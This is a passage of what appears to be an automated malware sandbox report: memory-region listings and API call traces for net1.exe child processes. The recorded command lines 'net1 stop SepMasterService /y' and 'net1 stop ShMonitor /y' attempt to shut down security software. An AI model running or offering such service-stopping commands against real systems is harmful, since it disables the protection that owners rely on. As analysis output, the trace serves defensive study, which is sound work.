entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9955 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9956 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9957 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9958 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9959 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9960 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9961 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9962 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9963 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9964 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9965 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9966 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9967 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9968 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9969 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9970 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9971 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 745 os_tid = 0xe70 [0110.375] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb50 | out: lpSystemTimeAsFileTime=0x14fb50*(dwLowDateTime=0xf6f0e150, dwHighDateTime=0x1d48689)) [0110.375] GetCurrentProcessId () returned 0x126c [0110.375] GetCurrentThreadId () returned 0xe70 [0110.375] GetTickCount () returned 0x254f2 [0110.375] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb58 | out: lpPerformanceCount=0x14fb58*=1815729300000) returned 1 [0110.376] GetModuleHandleW (lpModuleName=0x0) returned 0xff910000 [0110.376] __set_app_type (_Type=0x1) [0110.376] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff929c9c) returned 0x0 [0110.377] __getmainargs (in: _Argc=0xff934780, _Argv=0xff934790, _Env=0xff934788, _DoWildCard=0, _StartInfo=0xff93479c | out: _Argc=0xff934780, _Argv=0xff934790, _Env=0xff934788) returned 0 [0110.377] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0110.377] GetConsoleOutputCP () returned 0x1b5 [0110.377] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff93cec0 | out: lpCPInfo=0xff93cec0) returned 1 [0110.377] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0110.379] sprintf_s (in: _DstBuf=0x14faf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0110.379] setlocale (category=0, locale=".437") returned="English_United States.437" [0110.381] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0110.381] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0110.381] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SepMasterService /y" [0110.381] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f890, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0110.381] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0110.381] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fae8 | out: Buffer=0x14fae8*=0x184d50) returned 0x0 [0110.381] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fae8 | out: Buffer=0x14fae8*=0x18c100) returned 0x0 [0110.381] _fileno (_File=0x7fefdba2a80) returned 0 [0110.381] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0110.381] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0110.381] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0110.381] _wcsicmp (_String1="config", _String2="stop") returned -16 [0110.382] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0110.382] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0110.382] _wcsicmp (_String1="file", _String2="stop") returned -13 [0110.382] _wcsicmp (_String1="files", _String2="stop") returned -13 [0110.382] _wcsicmp (_String1="group", _String2="stop") returned -12 [0110.382] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0110.382] _wcsicmp (_String1="help", _String2="stop") returned -11 [0110.382] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0110.382] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0110.382] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0110.382] _wcsicmp (_String1="session", _String2="stop") returned -15 [0110.382] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0110.382] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0110.382] _wcsicmp (_String1="share", _String2="stop") returned -12 [0110.382] _wcsicmp (_String1="start", _String2="stop") returned -14 [0110.382] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0110.382] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0110.382] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0110.382] _wcsicmp (_String1="accounts", _String2="SepMasterService") returned -18 [0110.382] _wcsicmp (_String1="computer", _String2="SepMasterService") returned -16 [0110.382] _wcsicmp (_String1="config", _String2="SepMasterService") returned -16 [0110.382] _wcsicmp (_String1="continue", _String2="SepMasterService") returned -16 [0110.382] _wcsicmp (_String1="cont", _String2="SepMasterService") returned -16 [0110.382] _wcsicmp (_String1="file", _String2="SepMasterService") returned -13 [0110.382] _wcsicmp (_String1="files", _String2="SepMasterService") returned -13 [0110.382] _wcsicmp (_String1="group", _String2="SepMasterService") returned -12 [0110.382] _wcsicmp (_String1="groups", _String2="SepMasterService") returned -12 [0110.382] _wcsicmp (_String1="help", _String2="SepMasterService") returned -11 [0110.382] _wcsicmp (_String1="helpmsg", _String2="SepMasterService") returned -11 [0110.382] _wcsicmp (_String1="localgroup", _String2="SepMasterService") returned -7 [0110.382] _wcsicmp (_String1="pause", _String2="SepMasterService") returned -3 [0110.382] _wcsicmp (_String1="session", _String2="SepMasterService") returned 3 [0110.382] _wcsicmp (_String1="sessions", _String2="SepMasterService") returned 3 [0110.383] _wcsicmp (_String1="sess", _String2="SepMasterService") returned 3 [0110.383] _wcsicmp (_String1="share", _String2="SepMasterService") returned 3 [0110.383] _wcsicmp (_String1="start", _String2="SepMasterService") returned 15 [0110.383] _wcsicmp (_String1="stats", _String2="SepMasterService") returned 15 [0110.383] _wcsicmp (_String1="statistics", _String2="SepMasterService") returned 15 [0110.383] _wcsicmp (_String1="stop", _String2="SepMasterService") returned 15 [0110.383] _wcsicmp (_String1="time", _String2="SepMasterService") returned 1 [0110.383] _wcsicmp (_String1="user", _String2="SepMasterService") returned 2 [0110.383] _wcsicmp (_String1="users", _String2="SepMasterService") returned 2 [0110.383] _wcsicmp (_String1="msg", _String2="SepMasterService") returned -6 [0110.383] _wcsicmp (_String1="messenger", _String2="SepMasterService") returned -6 [0110.383] _wcsicmp (_String1="receiver", _String2="SepMasterService") returned -1 [0110.383] _wcsicmp (_String1="rcv", _String2="SepMasterService") returned -1 [0110.383] _wcsicmp (_String1="netpopup", _String2="SepMasterService") returned -5 [0110.383] _wcsicmp (_String1="redirector", _String2="SepMasterService") returned -1 [0110.383] _wcsicmp (_String1="redir", _String2="SepMasterService") returned -1 [0110.383] _wcsicmp (_String1="rdr", _String2="SepMasterService") returned -1 [0110.383] _wcsicmp (_String1="workstation", _String2="SepMasterService") returned 4 [0110.383] _wcsicmp (_String1="work", _String2="SepMasterService") returned 4 [0110.383] _wcsicmp (_String1="wksta", _String2="SepMasterService") returned 4 [0110.383] _wcsicmp (_String1="prdr", _String2="SepMasterService") returned -3 [0110.383] _wcsicmp (_String1="devrdr", _String2="SepMasterService") returned -15 [0110.383] _wcsicmp (_String1="lanmanworkstation", _String2="SepMasterService") returned -7 [0110.383] _wcsicmp (_String1="server", _String2="SepMasterService") returned 2 [0110.383] _wcsicmp (_String1="svr", _String2="SepMasterService") returned 17 [0110.383] _wcsicmp (_String1="srv", _String2="SepMasterService") returned 13 [0110.383] _wcsicmp (_String1="lanmanserver", _String2="SepMasterService") returned -7 [0110.383] _wcsicmp (_String1="alerter", _String2="SepMasterService") returned -18 [0110.383] _wcsicmp (_String1="netlogon", _String2="SepMasterService") returned -5 [0110.383] _wcsupr (in: _String="SepMasterService" | out: _String="SEPMASTERSERVICE") returned="SEPMASTERSERVICE" [0110.384] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x18ce10 [0110.388] GetServiceKeyNameW (in: hSCManager=0x18ce10, lpDisplayName="SEPMASTERSERVICE", lpServiceName=0xff935750, lpcchBuffer=0x14fa08 | out: lpServiceName="", lpcchBuffer=0x14fa08) returned 0 [0110.389] _wcsicmp (_String1="msg", _String2="SEPMASTERSERVICE") returned -6 [0110.389] _wcsicmp (_String1="messenger", _String2="SEPMASTERSERVICE") returned -6 [0110.389] _wcsicmp (_String1="receiver", _String2="SEPMASTERSERVICE") returned -1 [0110.389] _wcsicmp (_String1="rcv", _String2="SEPMASTERSERVICE") returned -1 [0110.389] _wcsicmp (_String1="redirector", _String2="SEPMASTERSERVICE") returned -1 [0110.389] _wcsicmp (_String1="redir", _String2="SEPMASTERSERVICE") returned -1 [0110.389] _wcsicmp (_String1="rdr", _String2="SEPMASTERSERVICE") returned -1 [0110.389] _wcsicmp (_String1="workstation", _String2="SEPMASTERSERVICE") returned 4 [0110.389] _wcsicmp (_String1="work", _String2="SEPMASTERSERVICE") returned 4 [0110.389] _wcsicmp (_String1="wksta", _String2="SEPMASTERSERVICE") returned 4 [0110.389] _wcsicmp (_String1="prdr", _String2="SEPMASTERSERVICE") returned -3 [0110.389] _wcsicmp (_String1="devrdr", _String2="SEPMASTERSERVICE") returned -15 [0110.389] _wcsicmp (_String1="lanmanworkstation", _String2="SEPMASTERSERVICE") returned -7 [0110.389] _wcsicmp (_String1="server", _String2="SEPMASTERSERVICE") returned 2 [0110.389] _wcsicmp (_String1="svr", _String2="SEPMASTERSERVICE") returned 17 [0110.389] _wcsicmp (_String1="srv", _String2="SEPMASTERSERVICE") returned 13 [0110.389] _wcsicmp (_String1="lanmanserver", _String2="SEPMASTERSERVICE") returned -7 [0110.389] _wcsicmp (_String1="alerter", _String2="SEPMASTERSERVICE") returned -18 [0110.389] _wcsicmp (_String1="netlogon", _String2="SEPMASTERSERVICE") returned -5 [0110.389] NetServiceControl (in: servername=0x0, service="SEPMASTERSERVICE", opcode=0x0, arg=0x0, bufptr=0x14fa10 | out: bufptr=0x14fa10) returned 0x889 [0110.390] wcscpy_s (in: _Destination=0xff9380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0110.390] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0110.391] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff935b50, nSize=0x800, Arguments=0xff937f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0110.392] GetFileType (hFile=0xb) returned 0x2 [0110.393] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f8d8 | out: lpMode=0x14f8d8) returned 1 [0110.393] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff935b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f8d0, lpReserved=0x0 | out: lpBuffer=0xff935b50*, lpNumberOfCharsWritten=0x14f8d0*=0x1e) returned 1 [0110.393] GetFileType (hFile=0xb) returned 0x2 [0110.393] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f8d8 | out: lpMode=0x14f8d8) returned 1 [0110.393] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff911efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f8d0, lpReserved=0x0 | out: lpBuffer=0xff911efc*, lpNumberOfCharsWritten=0x14f8d0*=0x2) returned 1 [0110.394] _ultow (in: _Dest=0x889, _Radix=1374528 | out: _Dest=0x889) returned="2185" [0110.394] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff935b50, nSize=0x800, Arguments=0xff937f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0110.394] GetFileType (hFile=0xb) returned 0x2 [0110.394] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f8d8 | out: lpMode=0x14f8d8) returned 1 [0110.394] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff935b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14f8d0, lpReserved=0x0 | out: lpBuffer=0xff935b50*, lpNumberOfCharsWritten=0x14f8d0*=0x34) returned 1 [0110.395] GetFileType (hFile=0xb) returned 0x2 [0110.395] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f8d8 | out: lpMode=0x14f8d8) returned 1 [0110.395] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff911efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f8d0, lpReserved=0x0 | out: lpBuffer=0xff911efc*, lpNumberOfCharsWritten=0x14f8d0*=0x2) returned 1 [0110.396] NetApiBufferFree (Buffer=0x184d50) returned 0x0 [0110.396] NetApiBufferFree (Buffer=0x18c100) returned 0x0 [0110.396] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SepMasterService /y" [0110.396] exit (_Code=2) Process: id = "264" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5abf1000" os_pid = "0x12cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "257" os_parent_pid = "0xf84" cmd_line = "C:\\Windows\\system32\\net1 stop ShMonitor /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9857 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9858 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9859 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9860 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 9861 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9862 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9863 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9864 start_va = 0xff910000 end_va = 0xff942fff entry_point = 0xff910000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9865 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9866 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9867 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 9868 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9869 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 9870 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9871 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9872 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9873 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9874 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9875 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 9876 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 9877 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9878 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9879 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9880 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9881 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9882 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9883 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9884 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9885 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9886 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9887 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9888 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9889 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9890 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9891 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9892 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9893 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9894 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9972 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 746 os_tid = 0x1280 [0110.291] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af890 | out: lpSystemTimeAsFileTime=0x1af890*(dwLowDateTime=0xf6e4fa70, dwHighDateTime=0x1d48689)) [0110.291] GetCurrentProcessId () returned 0x12cc [0110.291] GetCurrentThreadId () returned 0x1280 [0110.291] GetTickCount () returned 0x254a4 [0110.291] QueryPerformanceCounter (in: lpPerformanceCount=0x1af898 | out: lpPerformanceCount=0x1af898*=1815720900000) returned 1 [0110.293] GetModuleHandleW (lpModuleName=0x0) returned 0xff910000 [0110.293] __set_app_type (_Type=0x1) [0110.293] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff929c9c) returned 0x0 [0110.293] __getmainargs (in: _Argc=0xff934780, _Argv=0xff934790, _Env=0xff934788, _DoWildCard=0, _StartInfo=0xff93479c | out: _Argc=0xff934780, _Argv=0xff934790, _Env=0xff934788) returned 0 [0110.293] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0110.293] GetConsoleOutputCP () returned 0x1b5 [0110.398] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff93cec0 | out: lpCPInfo=0xff93cec0) returned 1 [0110.398] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0110.400] sprintf_s (in: _DstBuf=0x1af838, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0110.400] setlocale (category=0, locale=".437") returned="English_United States.437" [0110.402] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0110.402] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0110.402] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ShMonitor /y" [0110.402] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0110.402] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0110.402] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af828 | out: Buffer=0x1af828*=0x254d50) returned 0x0 [0110.402] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af828 | out: Buffer=0x1af828*=0x25c0f0) returned 0x0 [0110.402] _fileno (_File=0x7fefdba2a80) returned 0 [0110.403] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0110.403] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0110.403] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0110.403] _wcsicmp (_String1="config", _String2="stop") returned -16 [0110.403] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0110.403] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0110.403] _wcsicmp (_String1="file", _String2="stop") returned -13 [0110.403] _wcsicmp (_String1="files", _String2="stop") returned -13 [0110.403] _wcsicmp (_String1="group", _String2="stop") returned -12 [0110.403] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0110.403] _wcsicmp (_String1="help", _String2="stop") returned -11 [0110.403] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0110.403] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0110.403] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0110.403] _wcsicmp (_String1="session", _String2="stop") returned -15 [0110.403] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0110.403] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0110.403] _wcsicmp (_String1="share", _String2="stop") returned -12 [0110.403] _wcsicmp (_String1="start", _String2="stop") returned -14 [0110.403] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0110.403] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0110.403] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0110.403] _wcsicmp (_String1="accounts", _String2="ShMonitor") returned -18 [0110.404] _wcsicmp (_String1="computer", _String2="ShMonitor") returned -16 [0110.404] _wcsicmp (_String1="config", _String2="ShMonitor") returned -16 [0110.404] _wcsicmp (_String1="continue", _String2="ShMonitor") returned -16 [0110.404] _wcsicmp (_String1="cont", _String2="ShMonitor") returned -16 [0110.404] _wcsicmp (_String1="file", _String2="ShMonitor") returned -13 [0110.404] _wcsicmp (_String1="files", _String2="ShMonitor") returned -13 [0110.404] _wcsicmp (_String1="group", _String2="ShMonitor") returned -12 [0110.404] _wcsicmp (_String1="groups", 